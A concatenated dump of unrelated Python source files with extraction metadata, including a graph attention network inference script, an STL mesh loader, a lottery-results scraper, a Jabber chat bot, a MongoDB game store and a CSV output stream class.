parser.add_argument('--sparse', action='store_true', default=False, help='GAT with sparse version or not.')
parser.add_argument('--epochs', type=int, default=10000, help='Number of epochs to train.')
parser.add_argument('--lr', type=float, default=0.005, help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4, help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=8, help='Number of hidden units.')
parser.add_argument('--nb_heads', type=int, default=8, help='Number of head attentions.')
parser.add_argument('--dropout', type=float, default=0.6, help='Dropout rate (1 - keep probability).')
parser.add_argument('--alpha', type=float, default=0.2, help='Alpha for the leaky_relu.')
parser.add_argument('--patience', type=int, default=100, help='Patience')
parser.add_argument('--seed', type=int, default=72, help='Random seed.')
parser.add_argument('--time_file', type=str, default='', help='timing output file')
parser.add_argument('--pkl_file', type=str, default='trained-model.pkl', help='trained model input file (pkl)')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
# Load data
adj, features, labels, idx_train, idx_val, idx_test = load_data()
# Model and optimizer
if args.sparse:
model = SpGAT(nfeat=features.shape[1],
nhid=args.hidden,
nclass=int(labels.max()) + 1,
dropout=args.dropout,
nheads=args.nb_heads,
alpha=args.alpha)
else:
model = GAT(nfeat=features.shape[1],
nhid=args.hidden,
nclass=int(labels.max()) + 1,
dropout=args.dropout,
nheads=args.nb_heads,
alpha=args.alpha)
optimizer = optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay)
if args.cuda:
model.cuda()
features = features.cuda()
adj = adj.cuda()
labels = labels.cuda()
idx_train = idx_train.cuda()
idx_val = idx_val.cuda()
idx_test = idx_test.cuda()
features, adj, labels = Variable(features), Variable(adj), Variable(labels)
def compute_test():
with profiler.profile(profile_memory=True, record_shapes=True, use_cuda=True) as prof:
with profiler.record_function("model_inference"):
model.eval()
output = model(features, adj)
loss_test = F.nll_loss(output[idx_test], labels[idx_test])
acc_test = accuracy(output[idx_test], labels[idx_test])
print("Test set results:",
"loss= {:.4f}".format(loss_test.data.item()),
"accuracy= {:.4f}".format(acc_test.data.item()))
#print(prof.key_averages().table(sort_by="cpu_time_total", row_limit=10))
print(prof.key_averages().table(sort_by="cpu_memory_usage", row_limit=10))
def time_model(file):
model.eval()
n_warmup = 50
n_sample = 50
print("=== Running Warmup Passes")
for i in range(0,n_warmup):
output = model(features, adj)
print("=== Collecting Runtime over ", str(n_sample), " Passes")
tic = time.perf_counter()
for i in range(0,n_sample):
output = model(features, adj)
toc = time.perf_counter()
avg_runtime = float(toc - tic)/n_sample
print("average runtime = ", avg_runtime)
# write runtime to file
f = open(file, "w")
f.write(str(avg_runtime)+"\n")
f.close()
if __name__ == "__main__":
map_location=torch.device('cpu')
model.load_state_dict(torch.load(args.pkl_file))
if len(args.time_file) != 0: # time and send time to file
time_model(args.time_file)
compute_test() | [
"torch.manual_seed",
"utils.load_data",
"argparse.ArgumentParser",
"torch.nn.functional.nll_loss",
"utils.accuracy",
"torch.load",
"time.perf_counter",
"random.seed",
"torch.autograd.profiler.profile",
"torch.cuda.is_available",
"torch.autograd.profiler.record_function",
"numpy.random.seed",
... | [((464, 489), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (487, 489), False, 'import argparse\n'), ((1894, 1916), 'random.seed', 'random.seed', (['args.seed'], {}), '(args.seed)\n', (1905, 1916), False, 'import random\n'), ((1917, 1942), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (1931, 1942), True, 'import numpy as np\n'), ((1943, 1971), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (1960, 1971), False, 'import torch\n'), ((2091, 2102), 'utils.load_data', 'load_data', ([], {}), '()\n', (2100, 2102), False, 'from utils import load_data, accuracy\n'), ((1868, 1893), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1891, 1893), False, 'import torch\n'), ((1990, 2023), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['args.seed'], {}), '(args.seed)\n', (2012, 2023), False, 'import torch\n'), ((2986, 3004), 'torch.autograd.Variable', 'Variable', (['features'], {}), '(features)\n', (2994, 3004), False, 'from torch.autograd import Variable\n'), ((3006, 3019), 'torch.autograd.Variable', 'Variable', (['adj'], {}), '(adj)\n', (3014, 3019), False, 'from torch.autograd import Variable\n'), ((3021, 3037), 'torch.autograd.Variable', 'Variable', (['labels'], {}), '(labels)\n', (3029, 3037), False, 'from torch.autograd import Variable\n'), ((4005, 4024), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4022, 4024), False, 'import time\n'), ((4105, 4124), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4122, 4124), False, 'import time\n'), ((4361, 4380), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (4373, 4380), False, 'import torch\n'), ((3068, 3140), 'torch.autograd.profiler.profile', 'profiler.profile', ([], {'profile_memory': '(True)', 'record_shapes': '(True)', 'use_cuda': '(True)'}), '(profile_memory=True, record_shapes=True, use_cuda=True)\n', (3084, 3140), True, 'import torch.autograd.profiler as profiler\n'), ((4407, 4432), 'torch.load', 'torch.load', (['args.pkl_file'], {}), '(args.pkl_file)\n', (4417, 4432), False, 'import torch\n'), ((3163, 3206), 'torch.autograd.profiler.record_function', 'profiler.record_function', (['"""model_inference"""'], {}), "('model_inference')\n", (3187, 3206), True, 'import torch.autograd.profiler as profiler\n'), ((3299, 3345), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['output[idx_test]', 'labels[idx_test]'], {}), '(output[idx_test], labels[idx_test])\n', (3309, 3345), True, 'import torch.nn.functional as F\n'), ((3369, 3413), 'utils.accuracy', 'accuracy', (['output[idx_test]', 'labels[idx_test]'], {}), '(output[idx_test], labels[idx_test])\n', (3377, 3413), False, 'from utils import load_data, accuracy\n')] |
import numpy as np
import logging
import random
def open_stl(filename):
count = 0
with open(filename) as f:
for line in f:
count += 1
logging.info("number of lines {}".format(count))
tri_count = (count - 2) / 7
logging.info("number of triangles {}".format(tri_count))
vert_count = tri_count * 3
logging.info("number of vertices {}".format(vert_count))
x = np.zeros((tri_count, 3))
y = np.zeros((tri_count, 3))
z = np.zeros((tri_count, 3))
i = 0
j = 0
with open(filename) as f:
for line in f:
if "vertex" in line:
tokens = line.split()
x[i][j] = float(tokens[1])
y[i][j] = float(tokens[2])
z[i][j] = float(tokens[3])
j += 1
if j == 3:
j = 0
i += 1
ratio = tri_count / 100000
if ratio >= 2:
x = x[::ratio,:]
y = y[::ratio,:]
z = z[::ratio,:]
tri_count = tri_count / ratio
triangles = [None] * tri_count
for i in xrange(tri_count):
v = i * 3
triangles[i] = (v, v+1, v+2)
return x.flatten(), y.flatten(), z.flatten() , triangles
if __name__ == "__main__":
# x, y, z, triangles = open_stl("STL_INSTANCES\\50_cat_3446170_3_d.stl")
x, y, z, triangles = open_stl("20_allison_x4560_1_e.stl")
from mayavi import mlab
s = mlab.triangular_mesh(x, y, z, triangles, color=(random.random() / 2 + 0.5,
random.random() / 2 + 0.5,
random.random() / 2 + 0.5
))
mlab.show()
| [
"random.random",
"numpy.zeros",
"mayavi.mlab.show"
] | [((431, 455), 'numpy.zeros', 'np.zeros', (['(tri_count, 3)'], {}), '((tri_count, 3))\n', (439, 455), True, 'import numpy as np\n'), ((465, 489), 'numpy.zeros', 'np.zeros', (['(tri_count, 3)'], {}), '((tri_count, 3))\n', (473, 489), True, 'import numpy as np\n'), ((499, 523), 'numpy.zeros', 'np.zeros', (['(tri_count, 3)'], {}), '((tri_count, 3))\n', (507, 523), True, 'import numpy as np\n'), ((1848, 1859), 'mayavi.mlab.show', 'mlab.show', ([], {}), '()\n', (1857, 1859), False, 'from mayavi import mlab\n'), ((1589, 1604), 'random.random', 'random.random', ([], {}), '()\n', (1602, 1604), False, 'import random\n'), ((1673, 1688), 'random.random', 'random.random', ([], {}), '()\n', (1686, 1688), False, 'import random\n'), ((1757, 1772), 'random.random', 'random.random', ([], {}), '()\n', (1770, 1772), False, 'import random\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from urllib.parse import urljoin
import requests
from bs4 import BeautifulSoup
import csv
def get_number(text: str) -> int:
return int(''.join(c for c in text.strip() if c.isdigit()))
first = 1
last = 50
step = 50
result = []
while True:
url = f'https://www.stoloto.ru/4x20/archive?firstDraw={first}&lastDraw={last}&mode=draw'
print(f'first={first}, last={last}: {url}')
rs = requests.get(url)
root = BeautifulSoup(rs.content, 'html.parser')
rows = root.select('.drawings_data .elem > .main')
# Если пустое, значит достигли конца
if not rows:
break
# Чтобы был порядок от меньшего к большему
rows.reverse()
for row in rows:
date_time_str = row.select_one('.draw_date').text.strip()
a = row.select_one('.draw > a')
abs_url = urljoin(url, a['href'])
number = get_number(a.text)
numbers = ' '.join(x.text.strip() for x in row.select('.numbers .numbers_wrapper b'))
prize = get_number(row.select_one('.prize').text)
item = [number, date_time_str, numbers, prize, abs_url]
result.append(item)
print(item)
first += step
last += step
print()
print(len(result), result)
# Наибольшая сумма приза
print(max(result, key=lambda x: x[3]))
# Наименьшая сумма приза
print(min(result, key=lambda x: x[3]))
print()
with open('all_lotto.csv', 'w', encoding='utf-8', newline='') as f:
file = csv.writer(f)
file.writerows(result)
| [
"bs4.BeautifulSoup",
"urllib.parse.urljoin",
"csv.writer",
"requests.get"
] | [((473, 490), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (485, 490), False, 'import requests\n'), ((502, 542), 'bs4.BeautifulSoup', 'BeautifulSoup', (['rs.content', '"""html.parser"""'], {}), "(rs.content, 'html.parser')\n", (515, 542), False, 'from bs4 import BeautifulSoup\n'), ((1501, 1514), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1511, 1514), False, 'import csv\n'), ((885, 908), 'urllib.parse.urljoin', 'urljoin', (['url', "a['href']"], {}), "(url, a['href'])\n", (892, 908), False, 'from urllib.parse import urljoin\n')] |
# -*- coding: utf-8 -*-
from common.models.notice.UserNews import UserNews
from common.services.BaseService import BaseService
from application import db
class NewsService(BaseService):
@staticmethod
def addNews(params):
model_user_news = UserNews(**params)
db.session.add(model_user_news)
db.session.commit()
| [
"common.models.notice.UserNews.UserNews",
"application.db.session.add",
"application.db.session.commit"
] | [((257, 275), 'common.models.notice.UserNews.UserNews', 'UserNews', ([], {}), '(**params)\n', (265, 275), False, 'from common.models.notice.UserNews import UserNews\n'), ((284, 315), 'application.db.session.add', 'db.session.add', (['model_user_news'], {}), '(model_user_news)\n', (298, 315), False, 'from application import db\n'), ((324, 343), 'application.db.session.commit', 'db.session.commit', ([], {}), '()\n', (341, 343), False, 'from application import db\n')] |
#!/usr/bin/env python
# vim:ts=4:sw=4:expandtab:ft=python:fileencoding=utf-8
"""Marvin jabber bot.
A jabber bot made to play with jabber, python, etc and hopefully still be
useful.
@todo: use a decorator for admin commands
"""
#__version__ = "$Rev$"
import sys
sys.path.append('lib')
import datetime
import hashlib
import os
import string
from random import choice
from ConfigParser import ConfigParser
from jabberbot import JabberBot
import botcommands
class MarvinJabberBot(JabberBot):
"""Incredible... It's even worse than I thought it would be.
Source code: http://github.com/vrillusions/marvin-jabberbot"""
def __init__(self, jid, password, res=None, adminjid=None):
"""The init function."""
if hasattr(JabberBot, '__init__'):
JabberBot.__init__(self, jid, password, res)
self.adminjid = adminjid
def _if_admin(self, jid, command):
if jid == self.adminjid:
result = eval(command)
return result
else:
return 'Not authorized'
def connectCallback(self):
"""Called after successful connection but before processing"""
# would have like to add the RegisterHandlers here but it doesn't appear to work
pass
def subscribe_handler(self, conn, pres):
"""Handles requests from users to subscribe to bot"""
# for some reason this HAS to be set before the initial connection. Place the
# following in the connect() function of main file
# conn.RegisterHandler('presence', self.subscribe_handler, 'subscribe')
jid = pres.getFrom().getStripped()
self.conn.Roster.Authorize(jid)
self.conn.Roster.Subscribe(jid)
def unsubscribed_handler(self, conn, pres):
"""Handles notifications that the user has unsubscribed (removed) the bot"""
# place follwoing in connect() function of main file
# conn.RegisterHandler('presence', self.unsubscribed_handler, 'unsubscribed')
jid = pres.getFrom().getStripped()
self.conn.Roster.delItem(jid)
def bot_privacy(self, mess, args):
"""A simplistic privacy polic (summary: nothing is logged)"""
privacytext = open('etc/privacy.txt', 'r').read()
return privacytext
def bot_serverinfo(self, mess, args):
"""HIDDEN Displays information about the server."""
#version = open('/proc/version').read().strip()
#loadavg = open('/proc/loadavg').read().strip()
#return '%s\n\n%s' % ( version, loadavg, )
jid = mess.getFrom().getStripped()
return self._if_admin(jid, 'botcommands.getServerInfo()')
def bot_url(self, mess, args):
"""Returns a shorten form of url."""
# only process the first "word"
if args == '':
return "Syntax: url http://google.com"
argList = []
argList = args.split()
return botcommands.getShortUrl(argList[0])
def bot_length(self, mess, args):
"""Returns how long the specified message is."""
return len(args)
def bot_md5(self, mess, args):
"""Returns MD5 hash in hexadecimal format."""
return hashlib.md5(args).hexdigest()
def bot_lookupmd5(self, mess, args):
"""Attempts to lookup the value of an MD5 hash."""
return botcommands.lookupMd5(args)
def bot_sha1(self, mess, args):
"""Returns SHA1 hash in hexadecimal format."""
return hashlib.sha1(args).hexdigest()
def bot_reload(self, mess, args):
"""HIDDEN Reloads the bot."""
jid = mess.getFrom().getStripped()
result = self._if_admin(jid, 'self.quit()')
return result
def bot_time(self, mess, args):
"""Displays current server time."""
return str(datetime.datetime.now()) + " EST/EDT"
def bot_rot13(self, mess, args):
"""Returns passed arguments rot13'ed."""
return args.encode('rot13')
def bot_whoami(self, mess, args):
"""Tells you your username."""
return mess.getFrom()
def bot_fortune(self, mess, args):
"""Get a random quote."""
# taken from snakebot jabber bot
fortune = os.popen('/usr/games/fortune').read()
return fortune
def bot_spell(self, mess, args):
"""Checks the spelling of a word"""
return botcommands.spellCheck(args)
def bot_random(self, mess, args):
"""Returns a random 32 character string useful for passwords"""
chars = string.letters + string.digits
randomOutput = ''
for i in range(32):
randomOutput = randomOutput + choice(chars)
return randomOutput
def bot_password(self, mess, args):
"""Similar to random command but tries to produce a pronounceable password"""
vowels = 'aeiou'
consonants = 'bcdfghjklmnpqrstvwxyz'
numbers = string.digits
randomPassword = ( choice(consonants) + choice(vowels) + choice(consonants) +
choice(vowels) + choice(consonants) + choice(vowels) + choice(consonants) +
choice(numbers) )
return randomPassword
def bot_ascii2hex(self, mess, args):
"""Takes an ascii string and converts it to hexadecimal."""
return args.encode('hex')
def bot_hex2ascii(self, mess, args):
"""Takes a hex string and converts it to ascii."""
return args.decode('hex')
def bot_dbg(self, mess, args):
"""HIDDEN used for debugging"""
jid = mess.getFrom().getStripped()
self._if_admin(jid, '"True"')
jid = mess.getFrom().getStripped()
jidobj = mess.getFrom()
#jid = '<EMAIL>'
subscribe = self.conn.Roster.getSubscription( jid)
ask = self.conn.Roster.getAsk(jid)
# show = self.conn.Roster.getShow(jidobj)
group = self.conn.Roster.getGroups(jid)
result = 'sub:%s ask:%s group:%s' % (subscribe, ask, group)
#result = self.conn.Roster.getRawItem(jid)
#result = self.conn.Roster.getItems()
return result
if __name__ == '__main__':
config = ConfigParser()
config.read('etc/config.ini')
username = config.get('jabberbot', 'username')
password = config.get('<PASSWORD>', 'password')
adminjid = config.get('jabberbot', 'adminjid')
bot = MarvinJabberBot(jid=username,password=password,adminjid=adminjid)
bot.serve_forever(bot.connectCallback())
# error handling is handled in serve_forever, don't think it is needed
# here. At least it's not as important
| [
"random.choice",
"hashlib.md5",
"botcommands.getShortUrl",
"jabberbot.JabberBot.__init__",
"ConfigParser.ConfigParser",
"datetime.datetime.now",
"os.popen",
"botcommands.spellCheck",
"hashlib.sha1",
"sys.path.append",
"botcommands.lookupMd5"
] | [((266, 288), 'sys.path.append', 'sys.path.append', (['"""lib"""'], {}), "('lib')\n", (281, 288), False, 'import sys\n'), ((6151, 6165), 'ConfigParser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (6163, 6165), False, 'from ConfigParser import ConfigParser\n'), ((2928, 2963), 'botcommands.getShortUrl', 'botcommands.getShortUrl', (['argList[0]'], {}), '(argList[0])\n', (2951, 2963), False, 'import botcommands\n'), ((3344, 3371), 'botcommands.lookupMd5', 'botcommands.lookupMd5', (['args'], {}), '(args)\n', (3365, 3371), False, 'import botcommands\n'), ((4372, 4400), 'botcommands.spellCheck', 'botcommands.spellCheck', (['args'], {}), '(args)\n', (4394, 4400), False, 'import botcommands\n'), ((787, 831), 'jabberbot.JabberBot.__init__', 'JabberBot.__init__', (['self', 'jid', 'password', 'res'], {}), '(self, jid, password, res)\n', (805, 831), False, 'from jabberbot import JabberBot\n'), ((5118, 5133), 'random.choice', 'choice', (['numbers'], {}), '(numbers)\n', (5124, 5133), False, 'from random import choice\n'), ((3194, 3211), 'hashlib.md5', 'hashlib.md5', (['args'], {}), '(args)\n', (3205, 3211), False, 'import hashlib\n'), ((3479, 3497), 'hashlib.sha1', 'hashlib.sha1', (['args'], {}), '(args)\n', (3491, 3497), False, 'import hashlib\n'), ((3812, 3835), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3833, 3835), False, 'import datetime\n'), ((4214, 4244), 'os.popen', 'os.popen', (['"""/usr/games/fortune"""'], {}), "('/usr/games/fortune')\n", (4222, 4244), False, 'import os\n'), ((4659, 4672), 'random.choice', 'choice', (['chars'], {}), '(chars)\n', (4665, 4672), False, 'from random import choice\n'), ((5084, 5102), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (5090, 5102), False, 'from random import choice\n'), ((5067, 5081), 'random.choice', 'choice', (['vowels'], {}), '(vowels)\n', (5073, 5081), False, 'from random import choice\n'), ((5046, 5064), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (5052, 5064), False, 'from random import choice\n'), ((5029, 5043), 'random.choice', 'choice', (['vowels'], {}), '(vowels)\n', (5035, 5043), False, 'from random import choice\n'), ((4995, 5013), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (5001, 5013), False, 'from random import choice\n'), ((4957, 4975), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (4963, 4975), False, 'from random import choice\n'), ((4978, 4992), 'random.choice', 'choice', (['vowels'], {}), '(vowels)\n', (4984, 4992), False, 'from random import choice\n')] |
from src.planners.exact._create_model import create_model
from src.planners.exact._read_model import read_model
from src.planners.planner import Planner
from pyomo.environ import *
class ExactPlanner(Planner):
def __init__(self,
opf_method='lossless',
observe_ev_locations='full',
future_model='known-future',
n_future_samples=5,
grid_transformation=None,
normalize=True,
obj_factors=(1, ),
tee=False,
accept_unknown_solution=False,
debugging=False,
**solver_options):
assert opf_method in ['exact', 'lossless'], ('Unknown opf method %s' % opf_method)
self.opf_method = opf_method
name_base = 'ExactPlanner' if opf_method == 'exact' else 'LosslessPlanner'
super().__init__(name_base, observe_ev_locations, future_model, n_future_samples,
grid_transformation, normalize, obj_factors, tee, accept_unknown_solution,
debugging, **solver_options)
def create_solver(self, ):
solver = SolverFactory('ipopt') if self.opf_method == 'exact' else SolverFactory('glpk')
#solver = SolverFactory('ipopt')
for key, val in self.solver_options.items():
solver.options[key] = val
return solver
def solve(self, true_grid, surrogate_grid, sampled_scenarios,
t_current_ind, SOC_evs_current, obj_factor, norm_factor):
model = create_model(self.opf_method, true_grid, surrogate_grid, sampled_scenarios, t_current_ind,
SOC_evs_current, obj_factor=obj_factor, norm_factor=norm_factor)
solver = self.create_solver()
solver.solve(model, tee=self.tee)
P_evs_now, P_nodes_now = read_model(model, surrogate_grid)
#print('P_evs_now:', P_evs_now.round())
#print('P_nodes_now', P_nodes_now.round())
#print()
#print('Solution:', P_evs_now)
#print('P_nodes_now', P_nodes_now)
return P_evs_now, [[]], [[]], [[]]
| [
"src.planners.exact._create_model.create_model",
"src.planners.exact._read_model.read_model"
] | [((1558, 1722), 'src.planners.exact._create_model.create_model', 'create_model', (['self.opf_method', 'true_grid', 'surrogate_grid', 'sampled_scenarios', 't_current_ind', 'SOC_evs_current'], {'obj_factor': 'obj_factor', 'norm_factor': 'norm_factor'}), '(self.opf_method, true_grid, surrogate_grid, sampled_scenarios,\n t_current_ind, SOC_evs_current, obj_factor=obj_factor, norm_factor=\n norm_factor)\n', (1570, 1722), False, 'from src.planners.exact._create_model import create_model\n'), ((1856, 1889), 'src.planners.exact._read_model.read_model', 'read_model', (['model', 'surrogate_grid'], {}), '(model, surrogate_grid)\n', (1866, 1889), False, 'from src.planners.exact._read_model import read_model\n')] |
import pymongo
import pymongo.errors
import datetime
import os
from src.Error.ErrorManager import ErrorManager, ErrorCode
class DbHandler:
snapshot_pattern = "%Y%m%d_%H%M"
snapshot_name = "snapshot"
key_game = "kornettoh"
key_name = 'name'
def __init__(self, party_name=key_game):
self.party_name = party_name
self.data = None
self.connection_url = "mongodb+srv://"+os.environ['MONGO_DB_USER'] +\
":"+os.environ['MONGO_DB_PASSWORD'] +\
"@"+os.environ['MONGO_DB_INSTANCE']+"/"
def retrieve_game(self):
client_mongo_db = self.create_mongo_db_client()
try:
docs = client_mongo_db.pereBlaise.games.find({self.key_name: self.party_name})
if docs.count() is 1:
self.data = docs[0]
else:
raise ValueError()
except ValueError:
ErrorManager().add_error(ErrorCode.NO_DOCUMENT_FOUND, "retrieve_game")
client_mongo_db.close()
return
client_mongo_db.close()
def update_game(self):
client_mongo_db = self.create_mongo_db_client()
result = True
try:
replace_result = self.replace_one(client_mongo_db)
if replace_result.matched_count > 0:
print("Id updated " + str(replace_result.upserted_id))
else:
raise ValueError()
except ValueError:
ErrorManager().add_error(ErrorCode.NO_DOCUMENT_FOUND, "update_game")
result = False
client_mongo_db.close()
return result
def save_snapshot_game(self):
self.data[self.key_name] = self.snapshot_name +\
self.key_game +\
datetime.datetime.now().strftime(self.snapshot_pattern)
client_mongo = self.create_mongo_db_client()
inserted_id = None
try:
print(self.data)
if "_id" in self.data:
self.data.pop("_id")
insert_result = self.insert_one(client_mongo)
if insert_result is None or insert_result.inserted_id is None:
raise ValueError()
else:
inserted_id = insert_result.inserted_id
except ValueError:
ErrorManager().add_error(ErrorCode.NO_DOCUMENT_INSERTED, "save_snapshot")
client_mongo.close()
return inserted_id
def create_mongo_db_client(self):
try:
return pymongo.MongoClient(self.connection_url)
except pymongo.errors.ConfigurationError as e:
ErrorManager().add_error(ErrorCode.UNABLE_TO_CONNECT_DB, "create_mongo_db_client")
raise e
def insert_one(self, client_mongo_db):
return client_mongo_db.pereBlaise.games.insert_one(self.data)
def replace_one(self, client_mongo_db):
return client_mongo_db.pereBlaise.games.replace_one({self.key_name: self.party_name}, self.data)
def read_file_for_character(self, user_id):
if self.data is None:
self.retrieve_game()
for player in self.data['settings']['characters']:
if player["PLAYER"] == user_id:
return player
ErrorManager().add_error(ErrorCode.NO_CHARACTER_FOUND, "read_file_for_character")
| [
"pymongo.MongoClient",
"datetime.datetime.now",
"src.Error.ErrorManager.ErrorManager"
] | [((2552, 2592), 'pymongo.MongoClient', 'pymongo.MongoClient', (['self.connection_url'], {}), '(self.connection_url)\n', (2571, 2592), False, 'import pymongo\n'), ((3280, 3294), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (3292, 3294), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((1819, 1842), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1840, 1842), False, 'import datetime\n'), ((936, 950), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (948, 950), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((1489, 1503), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (1501, 1503), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((2350, 2364), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (2362, 2364), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n'), ((2660, 2674), 'src.Error.ErrorManager.ErrorManager', 'ErrorManager', ([], {}), '()\n', (2672, 2674), False, 'from src.Error.ErrorManager import ErrorManager, ErrorCode\n')] |
import csv
import io
from darcyai.file_stream import FileStream
from darcyai.output.output_stream import OutputStream
from darcyai.utils import validate_not_none, validate_type
class CSVOutputStream(OutputStream):
"""
OutputStream implementation that writes to a CSV file.
# Arguments
file_path (str): The path to the CSV file to write to.
delimiter (str): The delimiter to use in the CSV file. Defaults to `,`.
quotechar (str): The quote character to use in the CSV file. Defaults to `|`.
buffer_size (int): The size of the buffer to use when writing to theCSV file.
Defaults to `0`.
flush_interval (int): The number of seconds before flushing the buffer to disk.
Defaults to `0`.
# Examples
```python
>>> from darcyai.output.csv_output_stream import CSVOutputStream
>>> csv_output_stream = CSVOutputStream(file_path="output.csv",
delimiter=",",
quotechar="|",
buffer_size=1024*1024,
flush_interval=0)
```
"""
def __init__(
self,
file_path: str,
delimiter: str = ",",
quotechar: str = "|",
buffer_size: int = 0,
flush_interval: int = 0) -> None:
super().__init__()
validate_not_none(file_path, "file_path is required")
validate_type(file_path, str, "file_path must be a string")
validate_not_none(delimiter, "delimiter is required")
validate_type(delimiter, str, "delimiter must be a string")
validate_not_none(quotechar, "quotechar is required")
validate_type(quotechar, str, "quotechar must be a string")
self.__file_stream = FileStream(
file_path,
buffer_size=buffer_size,
flush_interval=flush_interval)
self.__delimiter = delimiter
self.__quotechar = quotechar
self.__delimiter = delimiter
self.__quotechar = quotechar
self.config_schema = []
def write(self, data: list) -> None:
"""
Writes the given data to the CSV file.
# Arguments
data (list): The data to write to the CSV file.
# Examples
```python
>>> from darcyai.output.csv_output_stream import CSVOutputStream
>>> csv_output_stream = CSVOutputStream(file_path="output.csv",
delimiter=",",
quotechar="|",
buffer_size=1024*1024,
flush_interval=0)
>>> csv_output_stream.write([["a", "b", "c"], ["d", "e", "f"]])
```
"""
if data is None:
return
validate_type(data, list, "data must be a list")
output = io.StringIO()
csv_writer = csv.writer(
output,
delimiter=self.__delimiter,
quotechar=self.__quotechar)
csv_writer.writerow(data)
self.__file_stream.write_string(output.getvalue())
def close(self) -> None:
"""
Closes the CSV file.
# Examples
```python
>>> from darcyai.output.csv_output_stream import CSVOutputStream
>>> csv_output_stream = CSVOutputStream(file_path="output.csv",
delimiter=",",
quotechar="|",
buffer_size=1024*1024,
flush_interval=0)
>>> csv_output_stream.close()
```
"""
self.__file_stream.close()
| [
"darcyai.utils.validate_not_none",
"darcyai.file_stream.FileStream",
"csv.writer",
"io.StringIO",
"darcyai.utils.validate_type"
] | [((1413, 1466), 'darcyai.utils.validate_not_none', 'validate_not_none', (['file_path', '"""file_path is required"""'], {}), "(file_path, 'file_path is required')\n", (1430, 1466), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1475, 1534), 'darcyai.utils.validate_type', 'validate_type', (['file_path', 'str', '"""file_path must be a string"""'], {}), "(file_path, str, 'file_path must be a string')\n", (1488, 1534), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1544, 1597), 'darcyai.utils.validate_not_none', 'validate_not_none', (['delimiter', '"""delimiter is required"""'], {}), "(delimiter, 'delimiter is required')\n", (1561, 1597), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1606, 1665), 'darcyai.utils.validate_type', 'validate_type', (['delimiter', 'str', '"""delimiter must be a string"""'], {}), "(delimiter, str, 'delimiter must be a string')\n", (1619, 1665), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1675, 1728), 'darcyai.utils.validate_not_none', 'validate_not_none', (['quotechar', '"""quotechar is required"""'], {}), "(quotechar, 'quotechar is required')\n", (1692, 1728), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1737, 1796), 'darcyai.utils.validate_type', 'validate_type', (['quotechar', 'str', '"""quotechar must be a string"""'], {}), "(quotechar, str, 'quotechar must be a string')\n", (1750, 1796), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((1827, 1904), 'darcyai.file_stream.FileStream', 'FileStream', (['file_path'], {'buffer_size': 'buffer_size', 'flush_interval': 'flush_interval'}), '(file_path, buffer_size=buffer_size, flush_interval=flush_interval)\n', (1837, 1904), False, 'from darcyai.file_stream import FileStream\n'), ((2897, 2945), 'darcyai.utils.validate_type', 'validate_type', (['data', 'list', '"""data must be a list"""'], {}), "(data, list, 'data must be a list')\n", (2910, 2945), False, 'from darcyai.utils import validate_not_none, validate_type\n'), ((2964, 2977), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (2975, 2977), False, 'import io\n'), ((2999, 3073), 'csv.writer', 'csv.writer', (['output'], {'delimiter': 'self.__delimiter', 'quotechar': 'self.__quotechar'}), '(output, delimiter=self.__delimiter, quotechar=self.__quotechar)\n', (3009, 3073), False, 'import csv\n')] |
import json
import logging
from enum import Enum
from typing import Dict
import requests
from prometheus_client.parser import text_string_to_metric_families
from src.utils.exceptions import (NoMetricsGivenException,
MetricNotFoundException,
ReceivedUnexpectedDataException)
class RequestStatus(Enum):
SUCCESS = True
FAILED = False
def get_json(endpoint: str, logger: logging.Logger, params=None,
verify: bool = True):
if params is None:
params = {}
get_ret = requests.get(url=endpoint, params=params, timeout=10,
verify=verify, headers={'Connection': 'close'})
logger.debug("get_json: get_ret: %s", get_ret)
return json.loads(get_ret.content.decode('UTF-8'))
def get_prometheus(endpoint: str, logger: logging.Logger, verify: bool = True):
metrics = requests.get(endpoint, timeout=10, verify=verify, headers={
'Connection': 'close'}).content
logger.debug("Retrieved prometheus data from endpoint: " + endpoint)
return metrics.decode('utf-8')
def get_prometheus_metrics_data(endpoint: str,
requested_metrics: Dict[str, str],
logger: logging.Logger,
verify: bool = True) -> Dict:
"""
